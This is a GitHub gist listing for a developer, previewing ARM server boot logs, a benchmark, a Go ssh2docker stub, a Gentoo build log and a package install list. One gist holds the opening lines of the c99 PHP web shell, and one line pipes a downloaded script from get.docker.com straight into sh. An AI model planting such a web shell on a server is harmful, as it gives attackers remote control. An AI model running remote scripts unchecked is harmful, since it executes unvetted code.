Skip to content

Instantly share code, notes, and snippets.

View moul's full-sized avatar
🌸
societal evolution engineer

Manfred Touron moul

🌸
societal evolution engineer
View GitHub Profile
@moul
moul / gist:5f05470d3295c9e1c832
Created July 31, 2015 10:52
systemd debian jessie
[ 35.668159] systemd[1]: systemd 215 running in system mode. (+PAM +AUDIT +SELINUX +IMA +SYSVINIT +LIBCRYPTSETUP +GCRYPT +ACL +XZ -SECCOMP -APPARMOR)
[ 35.828042] systemd[1]: Detected architecture 'arm'.
[ 35.890074] systemd[1]: Failed to insert module 'autofs4'
Welcome to D[ 35.955940] systemd[1]: Failed to insert module 'ipv6'
ebian GNU/Linux [ 36.034481] systemd[1]: Set hostname to <kickass-galileo>.
8 (jessie)!
[ 36.255114] systemd[1]: Starting Network is Online.
[ OK [ 36.313936] systemd[1]: Reached target Network is Online.
@moul
moul / alpine.md
Last active August 29, 2015 14:28
initrd buffering issue ?
Welcome to Scaleway' initrd            http://j.mp/scw-initrd-linux

███████╗ ██████╗ █████╗ ██╗     ███████╗██╗    ██╗ █████╗ ██╗   ██╗
██╔════╝██╔════╝██╔══██╗██║     ██╔════╝██║    ██║██╔══██╗╚██╗ ██╔╝
███████╗██║     ███████║██║     █████╗  ██║ █╗ ██║███████║ ╚████╔╝
╚════██║██║     ██╔══██║██║     ██╔══╝  ██║███╗██║██╔══██║  ╚██╔╝
███████║╚██████╗██║  ██║███████╗███████╗╚███╔███╔╝██║  ██║   ██║
╚══════╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚══════╝ ╚══╝╚══╝ ╚═╝  ╚═╝   ╚═╝
@moul
moul / main.go
Created August 24, 2015 19:38
ssh2docker tmp
package main
import (
"net"
"github.com/Sirupsen/logrus"
"github.com/moul/ssh2docker"
)
func main() {
========================================================================
BYTE UNIX Benchmarks (Version 5.1.3)
System: condescending-perlman: GNU/Linux
OS: GNU/Linux -- 4.0.5-233 -- #1 SMP Fri Jun 19 08:33:31 UTC 2015
Machine: armv7l (armv7l)
Language: en_US.utf8 (charmap="UTF-8", collate="UTF-8")
CPU 0: ARMv7 Processor rev 2 (v7l) (0.0 bogomips)
CPU 1: ARMv7 Processor rev 2 (v7l) (0.0 bogomips)
@moul
moul / 1 - first boot.py
Last active August 28, 2015 15:02
boot 4.1.6-243
Welcome to Scaleway' initrd http://j.mp/scw-initrd-linux
███████╗ ██████╗ █████╗ ██╗ ███████╗██╗ ██╗ █████╗ ██╗ ██╗
██╔════╝██╔════╝██╔══██╗██║ ██╔════╝██║ ██║██╔══██╗╚██╗ ██╔╝
███████╗██║ ███████║██║ █████╗ ██║ █╗ ██║███████║ ╚████╔╝
╚════██║██║ ██╔══██║██║ ██╔══╝ ██║███╗██║██╔══██║ ╚██╔╝
███████║╚██████╗██║ ██║███████╗███████╗╚███╔███╔╝██║ ██║ ██║
╚══════╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚══════╝ ╚══╝╚══╝ ╚═╝ ╚═╝ ╚═╝
@moul
moul / .md
Created August 28, 2015 14:55
public kernels
uuid count public kernel dtb initrd title bootcmdargs
5f19794c-5dad-49bd-802a-db18a80f1d45 public kernel/pimouss-uImage-3.2.34-31-apparmor initrd/c1-uInitrd-v3.2 3.2.34-apparmor #31 LINUX_COMMON ip=dhcp boot=local root=/d
@moul
moul / c99.php
Created August 30, 2015 06:47
c99.php
<?php
//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
@moul
moul / gentoo failed build.txt
Created September 2, 2015 13:56
gentoo failed build.txt
root@docker-builder-6:~/docker-gentoo-stage3# ./update.sh
+ wget -N http://distfiles.gentoo.org/releases/arm/autobuilds/20150730/stage3-armv7a_hardfp-20150730.tar.bz2
--2015-09-02 13:09:17-- http://distfiles.gentoo.org/releases/arm/autobuilds/20150730/stage3-armv7a_hardfp-20150730.tar.bz2
Resolving distfiles.gentoo.org (distfiles.gentoo.org)... 137.226.34.42, 140.211.166.134, 216.165.129.135, ...
Connecting to distfiles.gentoo.org (distfiles.gentoo.org)|137.226.34.42|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 201848883 (192M) [application/octet-stream]
Server file no newer than local file ‘stage3-armv7a_hardfp-20150730.tar.bz2’ -- not retrieving.
+ cat stage3-armv7a_hardfp-20150730.tar.bz2
apt-get install bzr emacs24-nox htop tmux isc-dhcp-server python-pip hdparm smartmontools curl postgresql qemu-kvm mailutils aufs-tools  debootstrap  ethtool  git  mdadm  mtools  ncurses-term ubuntu-vm-builder

curl -sSL https://get.docker.com/ | sh

Keybase proof

I hereby claim:

  • I am moul on github.
  • I am moul (https://keybase.io/moul) on keybase.
  • I have a public key whose fingerprint is 0859 942B 474A 2B3C 90D3 8049 0DCB 9CE0 CABA E1B5

To claim this, I am signing this object: